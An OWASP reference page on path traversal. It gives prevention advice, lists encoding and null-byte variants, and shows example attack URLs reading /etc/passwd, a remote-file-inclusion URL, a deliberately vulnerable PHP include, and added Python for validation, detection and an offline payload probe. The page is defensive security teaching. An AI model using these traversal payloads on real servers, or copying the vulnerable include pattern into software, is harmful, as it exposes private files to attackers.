Effective URL: https://owasp.org/www-community/attacks/Path_Traversal
PATH TRAVERSAL


OVERVIEW

A path traversal attack (also known as directory traversal) aims to access files
and directories that are stored outside the web root folder. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and their
variations, or by using absolute file paths, it may be possible to access
arbitrary files and directories stored on the file system, including application
source code, configuration files and critical system files. Note that access is
still limited by the operating system's own access control: the application can
only reach what the account it runs as is allowed to read (and, on Microsoft
Windows, locked or in-use files may be inaccessible).

This attack is also known as “dot-dot-slash”, “directory traversal”, “directory
climbing” and “backtracking”.


RELATED SECURITY ACTIVITIES


HOW TO AVOID PATH TRAVERSAL VULNERABILITIES

All but the most simple web applications have to include local resources, such
as images, themes, other scripts, and so on. Every time a resource or file is
included by the application, there is a risk that an attacker may be able to
include a file or remote resource you didn’t authorize.

HOW TO IDENTIFY IF YOU ARE VULNERABLE

 * Be sure you understand how the underlying operating system will process
   filenames handed off to it.
 * Don’t store sensitive configuration files inside the web root.
 * For Windows IIS servers, the web root should not be on the system disk, to
   prevent recursive traversal back to system directories.

HOW TO PROTECT YOURSELF

 * Prefer working without user input when using file system calls.
 * Use indexes rather than actual portions of file names when templating or
   using language files (i.e. value 5 from the user submission = Czechoslovakian,
   rather than expecting the user to return “Czechoslovakian”).
 * Ensure the user cannot supply all parts of the path: prefix a base path that
   your code controls and append only the validated file name.
 * Validate the user’s input by only accepting known good; do not sanitize the
   data (stripping “../” once is easily bypassed, e.g. by “....//”).
 * Use chrooted jails and code access policies to restrict where the files can
   be obtained or saved to.
 * If forced to use user input for file operations, normalize the input before
   using it in file I/O APIs (for example Java’s Path.normalize()), and then
   check that the canonical result is still inside the intended base directory;
   normalization on its own does not reject “../”, it only resolves it.
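The advice above, as an added example (this is not code from the OWASP page): the vulnerable string-concatenation handler beside one that accepts only known-good names, never lets the user supply the whole path, canonicalises before touching the file system and checks the result stays under the base, plus an index lookup for the template case. The web root, file names and contents are constructed for the example.

```python
"""Hardened file access for a "?file=" style download endpoint."""
import re
import tempfile
from pathlib import Path

# Constructed layout: one legitimate download inside the web root and a
# configuration file one level above it that must never be served.
ROOT = Path(tempfile.mkdtemp())
PUBLIC = ROOT / "public"
PUBLIC.mkdir()
(PUBLIC / "report.pdf").write_bytes(b"%PDF report")
(ROOT / "config.ini").write_bytes(b"db_password=hunter2")

# Known-good form: one plain file name with an optional extension. Neither
# ".." nor any separator can match, so there is no sanitising to bypass.
NAME_RE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")


def vulnerable_read(user_file: str) -> bytes:
    """The pattern this page warns about: user input appended to a base path.

    '../config.ini' walks out of PUBLIC, and an absolute name such as
    '/etc/passwd' replaces the base entirely, because pathlib (like most
    join functions) discards the left operand when the right one is absolute.
    """
    return (PUBLIC / user_file).read_bytes()


def safe_read(user_file: str, base: Path = PUBLIC) -> bytes:
    """Accept only known-good names, then verify the canonical path stays under base."""
    if "\x00" in user_file:
        raise ValueError("null byte in file name")
    if not NAME_RE.fullmatch(user_file):
        raise ValueError("file name is not of the permitted form")
    # Defence in depth: resolve symlinks and any '..' and compare canonical
    # paths, so a later relaxation of NAME_RE cannot silently reopen the hole.
    base_real = base.resolve()
    target = (base_real / user_file).resolve()
    if base_real not in target.parents:
        raise ValueError("path escapes the web root")
    return target.read_bytes()


TEMPLATES = ["blue.html", "green.html"]


def template_for(choice: str) -> str:
    """Index rather than a file-name fragment: the user sends '1', we pick green.html.

    Range-check explicitly: int('-1') parses fine and a negative index would
    otherwise quietly select the last entry.
    """
    try:
        index = int(choice)
    except ValueError:
        raise ValueError("template choice must be an integer") from None
    if not 0 <= index < len(TEMPLATES):
        raise ValueError("template choice out of range")
    return TEMPLATES[index]


def rejected(fn, arg) -> bool:
    """True when fn(arg) raises ValueError; used to exercise the checks above."""
    try:
        fn(arg)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_read("../config.ini"))  # leaks db_password=hunter2
    print(safe_read("report.pdf"))
    for bad in ("../config.ini", "/etc/passwd", "report.pdf\x00.txt", "sub/report.pdf"):
        print(repr(bad), "rejected:", rejected(safe_read, bad))
```

The containment check compares resolved paths rather than string prefixes: a prefix test on `/var/www/public` would also accept `/var/www/public_old/secret`, and it would not notice a symlink inside the web root pointing elsewhere.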


HOW TO TEST FOR PATH TRAVERSAL VULNERABILITIES

See the OWASP Testing Guide article on how to test for path traversal
vulnerabilities.


DESCRIPTION


REQUEST VARIATIONS

Encoding and double encoding:

 * %2e%2e%2f represents ../
 * %2e%2e/ represents ../
 * ..%2f represents ../
 * %2e%2e%5c represents ..\
 * %2e%2e\ represents ..\
 * ..%5c represents ..\
 * %252e%252e%255c represents ..\
 * ..%255c represents ..\

and so on.

PERCENT ENCODING (AKA URL ENCODING)

Note that web containers perform one level of decoding on percent encoded values
from forms and URLs, so a double-encoded sequence such as %252e reaches the
application as %2e and may be decoded a second time by the application itself.

Overlong UTF-8 encodings of the separators, which some decoders have accepted as
equivalent to the plain characters:

 * ..%c0%af represents ../
 * ..%c1%9c represents ..\

OS SPECIFIC

UNIX

Root directory: “/”
Directory separator: “/”


WINDOWS

Root directory: “<partition letter>:\”
Directory separator: “/” or “\”
Note that Windows allows filenames to be followed by extra . \ / characters.


On many older platforms, a null byte (%00) can be injected to terminate the
filename, because the runtime hands the string to a C file API that stops at the
first null byte. For example, sending a parameter like:

?file=secret.doc%00.pdf

results in the Java application seeing a string that ends with “.pdf” while the
operating system opens a file that ends in “.doc”. Attackers may use this trick
to bypass extension checks. Current Java and PHP releases reject file names that
contain a null byte, so the trick mainly affects legacy platforms, but input
validation should still reject null bytes explicitly.
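The request variations, encodings and null-byte trick described above, collapsed by one normaliser, as an added example that is not code from the OWASP page. This is the kind of step a validation layer or a WAF rule applies to a file parameter before deciding whether it is a traversal attempt: it percent-decodes repeatedly (so double encoding collapses), maps the overlong UTF-8 forms %c0%af and %c1%9c to the separators they stand for, cuts at an embedded null byte (what a C file API would see), treats backslash as a separator as Windows does, and then counts how far the path climbs. The sample values and their expected verdicts are constructed for the example.

```python
"""Normalising a file parameter before looking for traversal."""
import re
from urllib.parse import unquote

DRIVE_RE = re.compile(r"^[A-Za-z]:/")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until nothing changes, e.g. %252e -> %2e -> '.'.

    Decoding as latin-1 turns every %XX into exactly one character, so the
    raw bytes of an overlong sequence survive to be matched afterwards.
    """
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value


def normalise(value: str) -> str:
    """Return the path the operating system would most plausibly act on."""
    s = fully_decode(value)
    s = s.replace("\xc0\xaf", "/").replace("\xc1\x9c", "\\")  # overlong UTF-8 '/' and '\'
    s = s.split("\x00", 1)[0]                                 # a null byte ends a C string
    return s.replace("\\", "/")                               # Windows accepts both separators


def climbs_out(path: str) -> bool:
    """True if the normalised path reaches above the base directory or replaces it."""
    if path.startswith("/") or DRIVE_RE.match(path):
        return True  # absolute path: the base is discarded entirely
    depth = 0
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def analyse(value: str) -> dict:
    """Verdict for one raw parameter value as received in the request."""
    decoded = fully_decode(value)
    path = normalise(value)
    return {
        "normalised": path,
        "traversal": climbs_out(path),
        "null_byte": "\x00" in decoded,
    }


# Constructed request values and the (traversal, null_byte) verdict each should get.
SAMPLES = {
    "report.pdf":                         (False, False),
    "docs/../report.pdf":                 (False, False),  # stays inside the base
    "../../../etc/passwd":                (True, False),
    "%2e%2e%2fetc%2fpasswd":              (True, False),
    "..%255c..%255cwindows%255cwin.ini":  (True, False),   # double-encoded backslash
    "..%c0%af..%c0%afetc/passwd":         (True, False),   # overlong UTF-8 slash
    "/etc/passwd":                        (True, False),
    "C:%5cwindows%5cwin.ini":             (True, False),
    "secret.doc%00.pdf":                  (False, True),   # extension-check bypass, not traversal
}


def check_samples() -> bool:
    """True when every constructed sample gets its expected verdict."""
    return all(
        (analyse(v)["traversal"], analyse(v)["null_byte"]) == expected
        for v, expected in SAMPLES.items()
    )


if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{value!r:40} -> {analyse(value)}")
```

A detector like this is only a second line of defence; the application itself should still accept only known-good file names, because the list of encodings a given container or operating system will honour is longer than any single normaliser.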


EXAMPLES


EXAMPLE 1

The following examples show how the application deals with the resources in use.

http://some_site.com.br/get-files.jsp?file=report.pdf
http://some_site.com.br/get-page.php?home=aaa.html 
http://some_site.com.br/some-page.asp?page=index.html


In these examples it’s possible to insert a malicious string as the variable
parameter to access files located outside the web publish directory.

http://some_site.com.br/get-files?file=../../../../some dir/some file
http://some_site.com.br/../../../../some dir/some file


The following URLs show examples of *NIX password file exploitation.

http://some_site.com.br/../../../../etc/shadow
http://some_site.com.br/get-files?file=/etc/passwd


Note: on Windows, relative traversal with ../ stays within the partition that
holds the web root (another drive is reachable only through an absolute path
such as D:\), whereas on Linux the whole file system hierarchy is reachable,
subject to the permissions of the account the web server runs as.


EXAMPLE 2

It’s also possible to include files and scripts located on an external website
(remote file inclusion) when the parameter is passed to an include mechanism
that accepts URLs.

http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php


EXAMPLE 3

This example illustrates a case in which the attacker makes the server return
the CGI script’s own source code by naming the script itself as the file:

http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi


EXAMPLE 4

This example was extracted from: Wikipedia - Directory Traversal

A typical example of vulnerable application code is:

<?php
// Deliberately vulnerable: the cookie value is appended to the template path
// with no validation, so "../" sequences walk out of the templates directory.
$template = 'blue.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>


An attack against this system could be to send the following HTTP request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd


Generating a server response such as:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh


The repeated ../ sequences after /home/users/phpguru/templates/ cause
include() to traverse up to the root directory and then include the UNIX
password file /etc/passwd.

/etc/passwd is the file most commonly used to demonstrate directory traversal:
it is world-readable and always present, and on older systems (as in the
response above) it held the password hashes that crackers would try to break.
On modern systems the hashes live in /etc/shadow, which is readable only by
root, so reading /etc/passwd mainly proves the traversal and enumerates the
accounts on the host.


ABSOLUTE PATH TRAVERSAL

The following URLs may be vulnerable to this attack:

http://testsite.com/get.php?f=list
http://testsite.com/get.cgi?f=2
http://testsite.com/get.asp?f=test


An attacker can execute this attack like this:

http://testsite.com/get.php?f=/var/www/html/get.php
http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc
http://testsite.com/get.asp?f=/etc/passwd


When the web server returns detailed error information from a web application,
it becomes much easier for the attacker to guess the correct locations (e.g. the
path to a source file, which can then be requested and displayed).
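Putting the relative and absolute variants from the examples above into a test harness, as an added example that is not code from the OWASP page or the Testing Guide. It builds candidate values for a `?file=` parameter (plain, single and double percent encoded, backslash, overlong UTF-8 and absolute forms, each with and without a trailing null byte), passes each to a caller-supplied fetch function, and recognises a leaked /etc/passwd by its line format rather than by guessing exact contents. The fetch function used here is a constructed in-memory stand-in for an old-style get-files handler on a Unix host (one round of URL decoding by the container, C-string truncation at a null byte, no containment check), so nothing touches the network; point `probe` at a real HTTP client only for systems you are authorised to test.

```python
"""Probing a file-serving parameter for traversal, offline."""
import posixpath
import re
from typing import Callable, List
from urllib.parse import unquote

TARGET = "etc/passwd"
# Ways of writing "../" or "..\" taken from the request-variation list on this page.
CLIMBS = ["../", "..%2f", "%2e%2e/", "%2e%2e%2f",
          "..%5c", "%2e%2e%5c", "..%255c", "%252e%252e%255c", "..%c0%af"]
# A real passwd file starts with a root entry whose uid field is 0.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:\d+:", re.MULTILINE)


def payloads(depth: int = 6) -> List[str]:
    """Candidate parameter values: the absolute form plus every climb, with and without %00."""
    out = [f"/{TARGET}"]
    for climb in CLIMBS:
        out.append(climb * depth + TARGET)
        out.append(climb * depth + TARGET + "%00.pdf")  # null byte before a checked extension
    return out


def looks_like_passwd(body: str) -> bool:
    """Recognise passwd content by shape, not by exact bytes."""
    return PASSWD_RE.search(body) is not None


def probe(fetch: Callable[[str], str], depth: int = 6) -> List[str]:
    """Return the payloads for which fetch() came back with a passwd-shaped body."""
    return [p for p in payloads(depth) if looks_like_passwd(fetch(p))]


# ---- constructed stand-in for a vulnerable server so the example runs offline ----
VFS = {
    "/var/www/files/report.pdf": "%PDF-1.4 report",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n"
                   "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
}


def fake_fetch(file_param: str) -> str:
    """Behaves like get-files?file=... on a legacy Unix stack (assumed behaviour)."""
    decoded = unquote(file_param, encoding="latin-1")  # the single decode a web container performs
    decoded = decoded.split("\x00", 1)[0]              # old runtime: the file API sees a C string
    path = posixpath.normpath(posixpath.join("/var/www/files", decoded))  # no containment check
    return VFS.get(path, "HTTP 404 Not Found")


if __name__ == "__main__":
    for hit in probe(fake_fetch):
        print("leak via file=", hit)
```

Against this stand-in only the forward-slash forms and the absolute path succeed: the kernel does not treat backslash or an overlong UTF-8 byte pair as a separator, and the container decodes only once, so the double-encoded forms arrive as literal `%5c`. Which variants work against a real target is exactly the information the probe is meant to gather.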


RELATED ATTACKS

 * Path Manipulation
 * Relative Path Traversal
 * Resource Injection


RELATED VULNERABILITIES

 * Improper Data Validation


RELATED CONTROLS

 * Input Validation Cheat Sheet


REFERENCES

 * http://cwe.mitre.org/data/definitions/22.html
 * http://www.webappsec.org/projects/threat/classes/path_traversal.shtml

OWASP, the OWASP logo, and Global AppSec are registered trademarks and AppSec
Days, AppSec California, AppSec Cali, SnowFROC, and LASCON are trademarks of the
OWASP Foundation, Inc. Unless otherwise specified, all content on the site is
Creative Commons Attribution-ShareAlike v4.0 and provided without warranty of
service or accuracy. For more information, please refer to our General
Disclaimer. OWASP does not endorse or recommend commercial products or services,
allowing our community to remain vendor neutral with the collective wisdom of
the best minds in software security worldwide. Copyright 2024, OWASP Foundation,
Inc.